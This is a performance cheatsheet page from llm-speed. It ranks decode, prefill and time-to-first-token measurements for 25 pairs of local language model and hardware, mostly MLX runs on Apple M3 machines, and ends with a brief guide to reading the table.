LLM speed cheatsheet

Best decode tokens-per-second for each (model × hardware) pair, measured by llm-speed under suite-v1. Numbers are wall-clock, batch size 1 unless the workload says otherwise. Each row links to the canonical run page; cite as llm-speed.com/r/<id>.

25 (model × hardware) combinations · sorted by decode tok/s · suite-v1

| Model | Quant | Hardware | Backend | Workload | decode tok/s | prefill tok/s | TTFT (ms) | Run |
|---|---|---|---|---|---:|---:|---:|---|
| mlx-community/stable-code-instruct-3b-4bit | | M3 Ultra (60-core GPU) + 96GB unified | mlx@0.31.3 | chat-short | 192.5 | 560.7 | 226.5 | r_y2_5y8oo97d |
| mlx-community/DeepSeek-Coder-V2-Lite-Instruct-4bit | | M3 Ultra (60-core GPU) + 96GB unified | mlx@0.31.3 | chat-short | 168.3 | 291.5 | 449.5 | r_l_v1-zq_qaz |
| mlx-community/gpt-oss-20b-MXFP4-Q4 | | M3 Ultra (60-core GPU) + 96GB unified | mlx@0.31.3 | chat-short | 152.7 | 239.9 | 692.1 | r_3ijun8ltjnb |
| mlx-community/Qwen2.5-Coder-7B-Instruct-4bit | | M3 Ultra (60-core GPU) + 96GB unified | mlx@0.31.3 | chat-short | 138.6 | 539.6 | 242.8 | r_uoehjq0nvc0 |
| mlx-community/granite-8b-code-instruct-4bit | | M3 Ultra (60-core GPU) + 96GB unified | mlx@0.31.3 | chat-short | 112.3 | 525.7 | 220.7 | r_bue3bee0gw7 |
| mlx-community/Qwen3-Coder-30B-A3B-Instruct-4bit | | M3 Ultra (60-core GPU) + 96GB unified | mlx@0.31.3 | chat-short | 112.2 | 204.0 | 539.3 | r_fpsca03u2o_ |
| mlx-community/Yi-Coder-9B-Chat-4bit | | M3 Ultra (60-core GPU) + 96GB unified | mlx@0.31.3 | chat-short | 103.5 | 390.9 | 307.0 | r_3hvui9a1yuc |
| mlx-community/gemma-2-9b-it-4bit | | M3 Ultra (60-core GPU) + 96GB unified | mlx@0.31.3 | chat-short | 89.5 | 170.7 | 691.4 | r_iz137eqvuzy |
| lmstudio-community-Qwen3-Next-80B-A3B-Instruct-MLX-4bit | 4bit | M3 Ultra (60-core GPU) + 96GB unified | mlx@0.31.3 | chat-short | 80.3 | 24.5 | 4492.5 | r_1pl79r50ofy |
| mlx-community/Qwen2.5-Coder-14B-Instruct-4bit | | M3 Ultra (60-core GPU) + 96GB unified | mlx@0.31.3 | chat-short | 70.5 | 306.1 | 427.9 | r_l36cijqxq4t |
| Qwen3.6-27B-Q4_K_M.gguf | | RTX 5090 (32GB) + AMD Ryzen 7 9850X3D 8-Core Processor (8c) + 30GB | llama.cpp | chat-short | 69.9 | 3995.5 | | r_bqsunbd6xa8 |
| mlx-community/starcoder2-15b-4bit | | M3 Ultra (60-core GPU) + 96GB unified | mlx@0.31.3 | chat-short | 64.2 | 220.5 | 489.8 | r_wsxml_39dh_ |
| mlx-community/Codestral-22B-v0.1-4bit | | M3 Ultra (60-core GPU) + 96GB unified | mlx@0.31.3 | chat-short | 47.5 | 205.7 | 559.1 | r_79dvtag5fd_ |
| mlx-community-Qwen2.5-32B-Instruct-4bit | 4bit | M3 Ultra (60-core GPU) + 96GB unified | mlx@0.31.3 | chat-short | 34.6 | 141.9 | 922.9 | r_njgxtgyym1e |
| mlx-community/Qwen2.5-Coder-32B-Instruct-4bit | | M3 Ultra (60-core GPU) + 96GB unified | mlx@0.31.3 | chat-short | 34.5 | 144.1 | 909.4 | r_721b4bls_oq |
| mlx-community/Qwen3-32B-4bit | | M3 Ultra (60-core GPU) + 96GB unified | mlx@0.31.3 | chat-short | 34.4 | 95.1 | 1156.4 | r_anmmc80-aoq |
| mlx-community-Qwen2.5-7B-Instruct-4bit | 4bit | M3 Pro (18-core GPU) + 36GB unified | mlx@0.31.3 | chat-short | 30.5 | 161.9 | 809.1 | r_llzv_g-ymaf |
| mlx-community/Llama-3.1-8B-Instruct-4bit | | M3 Pro (18-core GPU) + 36GB unified | mlx@0.31.3 | chat-short | 29.2 | 203.3 | 669.0 | r_h0-use1ypnb |
| mlx-community/gemma-2-9b-it-4bit | | M3 Pro (18-core GPU) + 36GB unified | mlx@0.31.3 | chat-short | 22.0 | 102.5 | 1151.3 | r_q7t7b7dcuz5 |
| mlx-community/llama-3.3-70b-Instruct-4bit | | M3 Ultra (60-core GPU) + 96GB unified | mlx@0.31.3 | chat-short | 16.8 | 25.1 | 5419.9 | r_sx3a4y9n-m4 |
| mlx-community/qwen2.5-72b-Instruct-4bit | | M3 Ultra (60-core GPU) + 96GB unified | mlx@0.31.3 | chat-short | 16.3 | 23.2 | 5635.3 | r_5c80gthqlh6 |
| mlx-community/phi-4-4bit | | M3 Pro (18-core GPU) + 36GB unified | mlx@0.31.3 | chat-short | 15.6 | 120.7 | 936.0 | r_-w8hnn61va_ |
| mlx-community-Qwen2.5-14B-Instruct-4bit | 4bit | M3 Pro (18-core GPU) + 36GB unified | mlx@0.31.3 | chat-short | 14.4 | 117.9 | 1111.5 | r_ia73dzeue0b |
| mlx-community/Qwen3-32B-4bit | | M3 Pro (18-core GPU) + 36GB unified | mlx@0.31.3 | chat-short | 7.2 | 25.7 | 4287.9 | r_pnrrpcdqfo4 |
| mlx-community/Qwen2.5-32B-Instruct-4bit | | M3 Pro (18-core GPU) + 36GB unified | mlx@0.31.3 | chat-short | 7.1 | 33.4 | 3921.1 | r_f4x3xaan2ay |

How to read this table

Each row is the highest decode tokens-per-second measured for a unique (model, hardware) pair. When more than one workload was run, we pick the workload that produced the headline number. Lower-tps duplicates from the same machine are not shown; click through to the run page for the full per-workload breakdown.
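The selection rule above can be sketched in a few lines of Python. This is an illustrative sketch, not llm-speed's actual code; the field names (`model`, `hardware`, `decode_tps`) are assumptions made for the example.

```python
# Illustrative sketch of the leaderboard's row-selection rule:
# keep the single highest decode tok/s run per (model, hardware) pair,
# then sort descending. Field names are hypothetical, not llm-speed's schema.

def headline_rows(runs):
    """runs: iterable of dicts with 'model', 'hardware', 'decode_tps' keys."""
    best = {}
    for run in runs:
        key = (run["model"], run["hardware"])
        # A later run replaces the stored one only if it decoded faster.
        if key not in best or run["decode_tps"] > best[key]["decode_tps"]:
            best[key] = run
    # Leaderboard order: highest decode tok/s first.
    return sorted(best.values(), key=lambda r: r["decode_tps"], reverse=True)
```

Any lower-tps duplicate for the same pair is dropped by the dictionary update, which is why only one row per (model, hardware) appears above.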

decode tok/s is wall-clock streaming throughput (memory-bandwidth-bound). prefill tok/s is prompt ingestion throughput (compute-bound). TTFT is time-to-first-token in milliseconds. See /glossary for definitions and /methodology for the workload spec.
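A minimal sketch of how these three numbers can be derived from a token stream, assuming timing starts when the prompt is submitted and the first token marks the end of prefill. This is not llm-speed's measurement harness; it only illustrates the definitions.

```python
import time

def measure_stream(token_iter):
    """Return (TTFT in ms, wall-clock decode tok/s) for a token stream.

    Assumes iteration begins when the prompt is submitted, so the gap to
    the first token covers prefill (TTFT), and the remaining tokens are
    pure decode. Illustrative only; real harnesses also report prefill
    tok/s from the prompt length, which a generic stream cannot see.
    """
    start = time.perf_counter()
    first = None
    count = 0
    for _ in token_iter:
        count += 1
        if first is None:
            first = time.perf_counter()  # first token -> end of prefill
    end = time.perf_counter()
    ttft_ms = (first - start) * 1000 if first is not None else None
    # Decode throughput excludes the first token, which prefill produced.
    decode_s = end - first if first is not None else 0.0
    decode_tps = (count - 1) / decode_s if count > 1 and decode_s > 0 else 0.0
    return ttft_ms, decode_tps
```

Because decode is memory-bandwidth-bound and prefill is compute-bound, the two throughput columns can differ by an order of magnitude on the same hardware, as the table shows.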